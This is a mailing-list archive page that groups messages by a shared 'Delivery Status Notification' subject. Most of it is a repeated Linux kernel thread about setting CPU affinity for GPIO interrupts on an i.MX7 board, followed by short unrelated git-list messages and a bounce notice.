> >> that GPIO interrupt can be served by another CPU ?
> >>
> >> Need your inputs to decide whether it is still possible to set
> >> affinity for GPIO interrupt, or its impossible ?
> >
> > This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
> > line per GPIO bank, so it is not possible to change affinity of a
> > single GPIO interrupt to another CPU.
>
> OK. Thanks for your confirmation.
>
> > Best we could do is change the
> > affinity of the whole bank,
>

Hi,

I found that the driver is responsible for setting GPIO bank in i.MX7:
https://elixir.bootlin.com/linux/v4.2/source/drivers/gpio/gpio-mxc.c

However I still dont know how to set the cpumask for one of the GPIO Bank.

>From this link, it seems it is possible to set affinity for a GPIO IRQ.
https://community.nxp.com/thread/303144

But when I try it form my GPIO138 (GPIO5_IO10) it did not help.

So, as you said, I wanted to change affinity for the whole GPIO bank and try it.
Please give me some pointers.

Thanks


> OK. How can we do this on the fly from my driver code.
> If you have any reference please let me know.
> This is required only for experimental purpose to prove the point to be mgmt.
> My idea is, from the driver, change the affinity of the whole bank.
> So, the GPIO interrupt can be delivered on to this specific CPU bank.
> Once I am done, I will revert back to the old bank.
> Please give me some hint on how to do this from my kernel module....
>
>
> > but given the limited usefulness of
> > something like that, nobody bothered to implement such a thing.
> >
> > Regards,
> > Lucas
> >
> >>
> >>
> >> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
> >> wrote:
> >> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
> >> > e> wrote:
> >> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
> >> > > ARM Linux:
> >> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> >> > > > > Hi,
> >> > > > >
> >> > > > > I need one help.
> >> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
> >> > > > >
> >> > > > > Let's say I am interested in GPIO number: 21
> >> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
> >> > > > > so I
> >> > > > > tried the below steps:
> >> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
> >> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> >> > > > > root at 10:~# cat /proc/interrupts | grep 21
> >> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
> >> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
> >> > > > > in
> >> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
> >> > > > > 3
> >> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
> >> > > > > -bash: echo: write error: Input/output error
> >> > > > >
> >> > > > > But I get input/output error.
> >> > > > > When I debug further, found that irq_can_set_affinity is
> >> > > > > returning 0:
> >> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> >> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> >> > > > > [    0.000000] write_irq_affinity: FAIL
> >> > > > >
> >> > > > > I also tried first setting /proc/irq/default_smp_affinity to
> >> > > > > 2 (from 3).
> >> > > > > This change is working, but the smp_affinity setting for the
> >> > > > > new IRQ
> >> > > > > is not working.
> >> > > > >
> >> > > > > When I try to set smp_affinity for mmc0, then it works.
> >> > > > > # cat /proc/interrupts | grep mmc
> >> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
> >> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
> >> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
> >> > > > >
> >> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
> >> > > > > root at 10:~#
> >> > > > >
> >> > > > >
> >> > > > > So, I wanted to know what are the conditions for which
> >> > > > > setting
> >> > > > > smp_affinity for an IRQ will work ?
> >> > > > >
> >> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
> >> > > > > IRQ ?
> >> > > > > Whether, irq_set_affinity_hint() will work in this case ?
> >> > > >
> >> > > > IRQ affinity is only supported where interrupts are _directly_
> >> > > > wired to
> >> > > > the GIC.  It's the GIC which does the interrupt steering to the
> >> > > > CPU
> >> > > > cores.
> >> > > >
> >> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
> >> > > > have no
> >> > > > ability to be directed independently to other CPUs - the only
> >> > > > possible
> >> > > > way to change the mapping is to move _all_ interrupts on that
> >> > > > controller,
> >> > > > and any downstream chained interrupts at GIC level.
> >> > > >
> >> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
> >> > > > is no way
> >> > > > for the interrupt controller itself to change the affinity of
> >> > > > the input
> >> > > > interrupt.
> >> > >
> >> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
> >> > > mapping
> >> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
> >> > > thus be
> >> > > handled by forwarding the request to the GIC by
> >> > > irq_chip_set_affinity_parent().
> >> > >
> >> > > As this is handled correctly in the upstream kernel since the
> >> > > first
> >> > > commit introducing support for the GPCv2, it seems the issue is
> >> > > only
> >> > > present in some downstream kernel.
> >> > >
> >> >
> >> > OK. Thanks so much for your reply.
> >> >
> >> > I saw some of the drivers using irq_set_affinity_hint() to force
> >> > the
> >> > IRQ affinity to a particular CPU.
> >> > This is the sample:
> >> > {
> >> > cpumask_clear(mask);
> >> > cpumask_set_cpu(cpu, mask);
> >> > irq_set_affinity_hint(irq, mask);
> >> > }
> >> >
> >> > Whether this logic will work for a particular GPIO pin ?
> >> >


>
> >> >
> >> > > Regards,
> >> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-17 13:28                   ` Pintu Kumar
  (?)
@ 2018-05-21 18:51                     ` Pintu Kumar
  -1 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-21 18:51 UTC (permalink / raw)
  To: Lucas Stach
  Cc: Russell King - ARM Linux, open list, linux-arm-kernel, kernelnewbies

Dear Lucas,

Can you give me some pointers on how to set affinity for entire GPIO Bank.
Currently I am exploring drivers/gpio/gpio-mxc.c to find out how the
GPIO banks are set up.

I also found that affinity can be set using: desc->irq_data.affinity,
may be by using cpumask_copy(...).
But still I am not familiar with this.

So, I need your help.


Thank You!

Regards,
Pintu



On Thu, May 17, 2018 at 6:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
> On Mon, May 14, 2018 at 7:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
>>
>> On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
>> > Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
>> >> Hi,
>> >>
>> >> Is there any work around possible to set IRQ affinity for some GPIO
>> >> interrupt ?
>> >> How to avoid CPU0 to receive the current GPIO interrupt ?
>> >> How do we assign GPIO interrupts to any CPU other than CPU0 ?
>> >> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
>> >> that GPIO interrupt can be served by another CPU ?
>> >>
>> >> Need your inputs to decide whether it is still possible to set
>> >> affinity for GPIO interrupt, or its impossible ?
>> >
>> > This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
>> > line per GPIO bank, so it is not possible to change affinity of a
>> > single GPIO interrupt to another CPU.
>>
>> OK. Thanks for your confirmation.
>>
>> > Best we could do is change the
>> > affinity of the whole bank,
>>
>
> Hi,
>
> I found that the driver is responsible for setting GPIO bank in i.MX7:
> https://elixir.bootlin.com/linux/v4.2/source/drivers/gpio/gpio-mxc.c
>
> However I still dont know how to set the cpumask for one of the GPIO Bank.
>
> From this link, it seems it is possible to set affinity for a GPIO IRQ.
> https://community.nxp.com/thread/303144
>
> But when I try it form my GPIO138 (GPIO5_IO10) it did not help.
>
> So, as you said, I wanted to change affinity for the whole GPIO bank and try it.
> Please give me some pointers.
>
> Thanks
>
>
>> OK. How can we do this on the fly from my driver code.
>> If you have any reference please let me know.
>> This is required only for experimental purpose to prove the point to be mgmt.
>> My idea is, from the driver, change the affinity of the whole bank.
>> So, the GPIO interrupt can be delivered on to this specific CPU bank.
>> Once I am done, I will revert back to the old bank.
>> Please give me some hint on how to do this from my kernel module....
>>
>>
>> > but given the limited usefulness of
>> > something like that, nobody bothered to implement such a thing.
>> >
>> > Regards,
>> > Lucas
>> >
>> >>
>> >>
>> >> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
>> >> wrote:
>> >> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
>> >> > e> wrote:
>> >> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
>> >> > > ARM Linux:
>> >> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> >> > > > > Hi,
>> >> > > > >
>> >> > > > > I need one help.
>> >> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
>> >> > > > >
>> >> > > > > Let's say I am interested in GPIO number: 21
>> >> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
>> >> > > > > so I
>> >> > > > > tried the below steps:
>> >> > > > > root@10:~# echo 21 > /sys/class/gpio/export
>> >> > > > > root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> >> > > > > root@10:~# cat /proc/interrupts | grep 21
>> >> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> >> > > > > root@10:~# cat /sys/class/gpio/gpio21/direction
>> >> > > > > in
>> >> > > > > root@10:~# cat /proc/irq/47/smp_affinity
>> >> > > > > 3
>> >> > > > > root@10:~# echo 2 > /proc/irq/47/smp_affinity
>> >> > > > > -bash: echo: write error: Input/output error
>> >> > > > >
>> >> > > > > But I get input/output error.
>> >> > > > > When I debug further, found that irq_can_set_affinity is
>> >> > > > > returning 0:
>> >> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> >> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> >> > > > > [    0.000000] write_irq_affinity: FAIL
>> >> > > > >
>> >> > > > > I also tried first setting /proc/irq/default_smp_affinity to
>> >> > > > > 2 (from 3).
>> >> > > > > This change is working, but the smp_affinity setting for the
>> >> > > > > new IRQ
>> >> > > > > is not working.
>> >> > > > >
>> >> > > > > When I try to set smp_affinity for mmc0, then it works.
>> >> > > > > # cat /proc/interrupts | grep mmc
>> >> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
>> >> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
>> >> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
>> >> > > > >
>> >> > > > > root@10:~# echo 2 > /proc/irq/295/smp_affinity
>> >> > > > > root@10:~#
>> >> > > > >
>> >> > > > >
>> >> > > > > So, I wanted to know what are the conditions for which
>> >> > > > > setting
>> >> > > > > smp_affinity for an IRQ will work ?
>> >> > > > >
>> >> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
>> >> > > > > IRQ ?
>> >> > > > > Whether, irq_set_affinity_hint() will work in this case ?
>> >> > > >
>> >> > > > IRQ affinity is only supported where interrupts are _directly_
>> >> > > > wired to
>> >> > > > the GIC.  It's the GIC which does the interrupt steering to the
>> >> > > > CPU
>> >> > > > cores.
>> >> > > >
>> >> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
>> >> > > > have no
>> >> > > > ability to be directed independently to other CPUs - the only
>> >> > > > possible
>> >> > > > way to change the mapping is to move _all_ interrupts on that
>> >> > > > controller,
>> >> > > > and any downstream chained interrupts at GIC level.
>> >> > > >
>> >> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
>> >> > > > is no way
>> >> > > > for the interrupt controller itself to change the affinity of
>> >> > > > the input
>> >> > > > interrupt.
>> >> > >
>> >> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
>> >> > > mapping
>> >> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
>> >> > > thus be
>> >> > > handled by forwarding the request to the GIC by
>> >> > > irq_chip_set_affinity_parent().
>> >> > >
>> >> > > As this is handled correctly in the upstream kernel since the
>> >> > > first
>> >> > > commit introducing support for the GPCv2, it seems the issue is
>> >> > > only
>> >> > > present in some downstream kernel.
>> >> > >
>> >> >
>> >> > OK. Thanks so much for your reply.
>> >> >
>> >> > I saw some of the drivers using irq_set_affinity_hint() to force
>> >> > the
>> >> > IRQ affinity to a particular CPU.
>> >> > This is the sample:
>> >> > {
>> >> > cpumask_clear(mask);
>> >> > cpumask_set_cpu(cpu, mask);
>> >> > irq_set_affinity_hint(irq, mask);
>> >> > }
>> >> >
>> >> > Whether this logic will work for a particular GPIO pin ?
>> >> >
>
>
>>
>> >> >
>> >> > > Regards,
>> >> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-21 18:51                     ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-21 18:51 UTC (permalink / raw)
  To: linux-arm-kernel

Dear Lucas,

Can you give me some pointers on how to set affinity for entire GPIO Bank.
Currently I am exploring drivers/gpio/gpio-mxc.c to find out how the
GPIO banks are set up.

I also found that affinity can be set using: desc->irq_data.affinity,
may be by using cpumask_copy(...).
But still I am not familiar with this.

So, I need your help.


Thank You!

Regards,
Pintu



On Thu, May 17, 2018 at 6:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
> On Mon, May 14, 2018 at 7:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
>>
>> On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
>> > Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
>> >> Hi,
>> >>
>> >> Is there any work around possible to set IRQ affinity for some GPIO
>> >> interrupt ?
>> >> How to avoid CPU0 to receive the current GPIO interrupt ?
>> >> How do we assign GPIO interrupts to any CPU other than CPU0 ?
>> >> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
>> >> that GPIO interrupt can be served by another CPU ?
>> >>
>> >> Need your inputs to decide whether it is still possible to set
>> >> affinity for GPIO interrupt, or its impossible ?
>> >
>> > This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
>> > line per GPIO bank, so it is not possible to change affinity of a
>> > single GPIO interrupt to another CPU.
>>
>> OK. Thanks for your confirmation.
>>
>> > Best we could do is change the
>> > affinity of the whole bank,
>>
>
> Hi,
>
> I found that the driver is responsible for setting GPIO bank in i.MX7:
> https://elixir.bootlin.com/linux/v4.2/source/drivers/gpio/gpio-mxc.c
>
> However I still dont know how to set the cpumask for one of the GPIO Bank.
>
> From this link, it seems it is possible to set affinity for a GPIO IRQ.
> https://community.nxp.com/thread/303144
>
> But when I try it form my GPIO138 (GPIO5_IO10) it did not help.
>
> So, as you said, I wanted to change affinity for the whole GPIO bank and try it.
> Please give me some pointers.
>
> Thanks
>
>
>> OK. How can we do this on the fly from my driver code.
>> If you have any reference please let me know.
>> This is required only for experimental purpose to prove the point to be mgmt.
>> My idea is, from the driver, change the affinity of the whole bank.
>> So, the GPIO interrupt can be delivered on to this specific CPU bank.
>> Once I am done, I will revert back to the old bank.
>> Please give me some hint on how to do this from my kernel module....
>>
>>
>> > but given the limited usefulness of
>> > something like that, nobody bothered to implement such a thing.
>> >
>> > Regards,
>> > Lucas
>> >
>> >>
>> >>
>> >> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
>> >> wrote:
>> >> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
>> >> > e> wrote:
>> >> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
>> >> > > ARM Linux:
>> >> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> >> > > > > Hi,
>> >> > > > >
>> >> > > > > I need one help.
>> >> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
>> >> > > > >
>> >> > > > > Let's say I am interested in GPIO number: 21
>> >> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
>> >> > > > > so I
>> >> > > > > tried the below steps:
>> >> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
>> >> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> >> > > > > root at 10:~# cat /proc/interrupts | grep 21
>> >> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> >> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
>> >> > > > > in
>> >> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
>> >> > > > > 3
>> >> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>> >> > > > > -bash: echo: write error: Input/output error
>> >> > > > >
>> >> > > > > But I get input/output error.
>> >> > > > > When I debug further, found that irq_can_set_affinity is
>> >> > > > > returning 0:
>> >> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> >> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> >> > > > > [    0.000000] write_irq_affinity: FAIL
>> >> > > > >
>> >> > > > > I also tried first setting /proc/irq/default_smp_affinity to
>> >> > > > > 2 (from 3).
>> >> > > > > This change is working, but the smp_affinity setting for the
>> >> > > > > new IRQ
>> >> > > > > is not working.
>> >> > > > >
>> >> > > > > When I try to set smp_affinity for mmc0, then it works.
>> >> > > > > # cat /proc/interrupts | grep mmc
>> >> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
>> >> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
>> >> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
>> >> > > > >
>> >> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>> >> > > > > root at 10:~#
>> >> > > > >
>> >> > > > >
>> >> > > > > So, I wanted to know what are the conditions for which
>> >> > > > > setting
>> >> > > > > smp_affinity for an IRQ will work ?
>> >> > > > >
>> >> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
>> >> > > > > IRQ ?
>> >> > > > > Whether, irq_set_affinity_hint() will work in this case ?
>> >> > > >
>> >> > > > IRQ affinity is only supported where interrupts are _directly_
>> >> > > > wired to
>> >> > > > the GIC.  It's the GIC which does the interrupt steering to the
>> >> > > > CPU
>> >> > > > cores.
>> >> > > >
>> >> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
>> >> > > > have no
>> >> > > > ability to be directed independently to other CPUs - the only
>> >> > > > possible
>> >> > > > way to change the mapping is to move _all_ interrupts on that
>> >> > > > controller,
>> >> > > > and any downstream chained interrupts at GIC level.
>> >> > > >
>> >> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
>> >> > > > is no way
>> >> > > > for the interrupt controller itself to change the affinity of
>> >> > > > the input
>> >> > > > interrupt.
>> >> > >
>> >> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
>> >> > > mapping
>> >> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
>> >> > > thus be
>> >> > > handled by forwarding the request to the GIC by
>> >> > > irq_chip_set_affinity_parent().
>> >> > >
>> >> > > As this is handled correctly in the upstream kernel since the
>> >> > > first
>> >> > > commit introducing support for the GPCv2, it seems the issue is
>> >> > > only
>> >> > > present in some downstream kernel.
>> >> > >
>> >> >
>> >> > OK. Thanks so much for your reply.
>> >> >
>> >> > I saw some of the drivers using irq_set_affinity_hint() to force
>> >> > the
>> >> > IRQ affinity to a particular CPU.
>> >> > This is the sample:
>> >> > {
>> >> > cpumask_clear(mask);
>> >> > cpumask_set_cpu(cpu, mask);
>> >> > irq_set_affinity_hint(irq, mask);
>> >> > }
>> >> >
>> >> > Whether this logic will work for a particular GPIO pin ?
>> >> >
>
>
>>
>> >> >
>> >> > > Regards,
>> >> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-21 18:51                     ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-21 18:51 UTC (permalink / raw)
  To: kernelnewbies

Dear Lucas,

Can you give me some pointers on how to set affinity for entire GPIO Bank.
Currently I am exploring drivers/gpio/gpio-mxc.c to find out how the
GPIO banks are set up.

I also found that affinity can be set using: desc->irq_data.affinity,
may be by using cpumask_copy(...).
But still I am not familiar with this.

So, I need your help.


Thank You!

Regards,
Pintu



On Thu, May 17, 2018 at 6:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
> On Mon, May 14, 2018 at 7:58 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
>>
>> On Mon, May 14, 2018 at 6:41 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
>> > Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
>> >> Hi,
>> >>
>> >> Is there any work around possible to set IRQ affinity for some GPIO
>> >> interrupt ?
>> >> How to avoid CPU0 to receive the current GPIO interrupt ?
>> >> How do we assign GPIO interrupts to any CPU other than CPU0 ?
>> >> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
>> >> that GPIO interrupt can be served by another CPU ?
>> >>
>> >> Need your inputs to decide whether it is still possible to set
>> >> affinity for GPIO interrupt, or its impossible ?
>> >
>> > This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
>> > line per GPIO bank, so it is not possible to change affinity of a
>> > single GPIO interrupt to another CPU.
>>
>> OK. Thanks for your confirmation.
>>
>> > Best we could do is change the
>> > affinity of the whole bank,
>>
>
> Hi,
>
> I found that the driver is responsible for setting GPIO bank in i.MX7:
> https://elixir.bootlin.com/linux/v4.2/source/drivers/gpio/gpio-mxc.c
>
> However I still dont know how to set the cpumask for one of the GPIO Bank.
>
> From this link, it seems it is possible to set affinity for a GPIO IRQ.
> https://community.nxp.com/thread/303144
>
> But when I try it form my GPIO138 (GPIO5_IO10) it did not help.
>
> So, as you said, I wanted to change affinity for the whole GPIO bank and try it.
> Please give me some pointers.
>
> Thanks
>
>
>> OK. How can we do this on the fly from my driver code.
>> If you have any reference please let me know.
>> This is required only for experimental purpose to prove the point to be mgmt.
>> My idea is, from the driver, change the affinity of the whole bank.
>> So, the GPIO interrupt can be delivered on to this specific CPU bank.
>> Once I am done, I will revert back to the old bank.
>> Please give me some hint on how to do this from my kernel module....
>>
>>
>> > but given the limited usefulness of
>> > something like that, nobody bothered to implement such a thing.
>> >
>> > Regards,
>> > Lucas
>> >
>> >>
>> >>
>> >> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
>> >> wrote:
>> >> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
>> >> > e> wrote:
>> >> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
>> >> > > ARM Linux:
>> >> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> >> > > > > Hi,
>> >> > > > >
>> >> > > > > I need one help.
>> >> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
>> >> > > > >
>> >> > > > > Let's say I am interested in GPIO number: 21
>> >> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
>> >> > > > > so I
>> >> > > > > tried the below steps:
>> >> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
>> >> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> >> > > > > root at 10:~# cat /proc/interrupts | grep 21
>> >> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> >> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
>> >> > > > > in
>> >> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
>> >> > > > > 3
>> >> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>> >> > > > > -bash: echo: write error: Input/output error
>> >> > > > >
>> >> > > > > But I get input/output error.
>> >> > > > > When I debug further, found that irq_can_set_affinity is
>> >> > > > > returning 0:
>> >> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> >> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> >> > > > > [    0.000000] write_irq_affinity: FAIL
>> >> > > > >
>> >> > > > > I also tried first setting /proc/irq/default_smp_affinity to
>> >> > > > > 2 (from 3).
>> >> > > > > This change is working, but the smp_affinity setting for the
>> >> > > > > new IRQ
>> >> > > > > is not working.
>> >> > > > >
>> >> > > > > When I try to set smp_affinity for mmc0, then it works.
>> >> > > > > # cat /proc/interrupts | grep mmc
>> >> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
>> >> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
>> >> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
>> >> > > > >
>> >> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>> >> > > > > root at 10:~#
>> >> > > > >
>> >> > > > >
>> >> > > > > So, I wanted to know what are the conditions for which
>> >> > > > > setting
>> >> > > > > smp_affinity for an IRQ will work ?
>> >> > > > >
>> >> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
>> >> > > > > IRQ ?
>> >> > > > > Whether, irq_set_affinity_hint() will work in this case ?
>> >> > > >
>> >> > > > IRQ affinity is only supported where interrupts are _directly_
>> >> > > > wired to
>> >> > > > the GIC.  It's the GIC which does the interrupt steering to the
>> >> > > > CPU
>> >> > > > cores.
>> >> > > >
>> >> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
>> >> > > > have no
>> >> > > > ability to be directed independently to other CPUs - the only
>> >> > > > possible
>> >> > > > way to change the mapping is to move _all_ interrupts on that
>> >> > > > controller,
>> >> > > > and any downstream chained interrupts at GIC level.
>> >> > > >
>> >> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
>> >> > > > is no way
>> >> > > > for the interrupt controller itself to change the affinity of
>> >> > > > the input
>> >> > > > interrupt.
>> >> > >
>> >> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
>> >> > > mapping
>> >> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
>> >> > > thus be
>> >> > > handled by forwarding the request to the GIC by
>> >> > > irq_chip_set_affinity_parent().
>> >> > >
>> >> > > As this is handled correctly in the upstream kernel since the
>> >> > > first
>> >> > > commit introducing support for the GPCv2, it seems the issue is
>> >> > > only
>> >> > > present in some downstream kernel.
>> >> > >
>> >> >
>> >> > OK. Thanks so much for your reply.
>> >> >
>> >> > I saw some of the drivers using irq_set_affinity_hint() to force
>> >> > the
>> >> > IRQ affinity to a particular CPU.
>> >> > This is the sample:
>> >> > {
>> >> > cpumask_clear(mask);
>> >> > cpumask_set_cpu(cpu, mask);
>> >> > irq_set_affinity_hint(irq, mask);
>> >> > }
>> >> >
>> >> > Whether this logic will work for a particular GPIO pin ?
>> >> >
>
>
>>
>> >> >
>> >> > > Regards,
>> >> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2022-06-09 21:08 postmaster
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster @ 2022-06-09 21:08 UTC (permalink / raw)
  To: linux-mm

[-- Attachment #1: Type: text/plain, Size: 145 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       flynnchris24@gmail.com




[-- Attachment #2: Type: message/delivery-status, Size: 520 bytes --]

[-- Attachment #3: Type: message/rfc822, Size: 11363 bytes --]

[-- Attachment #3.1: Type: text/html, Size: 8012 bytes --]

From: linux-mm@kvack.org
To: flynnchris24@gmail.com
Subject: Tug-No-More Web Contact Form
Date: 9 Jun 2022 14:06:38 -0400
Message-ID: <XFX-WEBXBYvhPBB3pdp00006b0d@web.xfxcloud.com>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <5cff8197.1c69fb81.4940.6de6.GMR@mx.google.com>
@ 2019-06-11 10:29   ` Xeno Amess
  0 siblings, 0 replies; 183+ messages in thread
From: Xeno Amess @ 2019-06-11 10:29 UTC (permalink / raw)
  To: git

Not all people can afford stable network connection...
I'm now suffered from connection lost and have to restart the clone/push fully.
It's OK when dealing with a project of several MB size, but when I try
to clone a 2GB sized repo I never succeed.
So I wonder, if there should be some way to resume from break-point for git?
For example what if we support something like Content-Range in http,
and make the download be split into smaller files, then make some way
to auto-resume if some file block failed hash-check?

^ permalink raw reply	[flat|nested] 183+ messages in thread

* RE: Delivery Status Notification (Failure)
  2019-02-18 20:59       ` Johannes Schindelin
@ 2019-02-19  1:08         ` Jason Pyeron
  0 siblings, 0 replies; 183+ messages in thread
From: Jason Pyeron @ 2019-02-19  1:08 UTC (permalink / raw)
  To: git; +Cc: 'Johannes Schindelin', 'Senol Yazici'

> -----Original Message-----
> From: Johannes Schindelin
> Sent: Monday, February 18, 2019 4:00 PM
> 
> On Mon, 18 Feb 2019, Senol Yazici wrote:
> >
> > I just stumbled over following page
> >
> > https://git-scm.com/about/distributed
> >
> > and was wondering if it is possible to
> >
> > - demilitarise that “dictator/lieutenant” thing and
> > - de-religionise that “blessed” thing
> >
> > I did not had the feeling that git is “pro military”, or is against
> > “non religious” developers/users.
> 
> Those are valid concerns, and I value your feedback.
> 
> It would probably be a good thing to change this, and you can even do it
> yourself: create a Pull Request to change this file:
> 
> https://github.com/git/git-scm.com/blob/master/app/views/about/_distributed.html.erb
> 

Curious, where are the sources for the PNGs saved? I did not find any obvious vector or art project files.

-Jason


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2019-02-18 10:46     ` Senol Yazici
  2019-02-18 16:12       ` Randall S. Becker
@ 2019-02-18 20:59       ` Johannes Schindelin
  2019-02-19  1:08         ` Jason Pyeron
  1 sibling, 1 reply; 183+ messages in thread
From: Johannes Schindelin @ 2019-02-18 20:59 UTC (permalink / raw)
  To: Senol Yazici; +Cc: git

[-- Attachment #1: Type: text/plain, Size: 770 bytes --]

Hi,


On Mon, 18 Feb 2019, Senol Yazici wrote:

> Hi all,
> 
> I just stumbled over following page
> 
> https://git-scm.com/about/distributed
> 
> and was wondering if it is possible to
> 
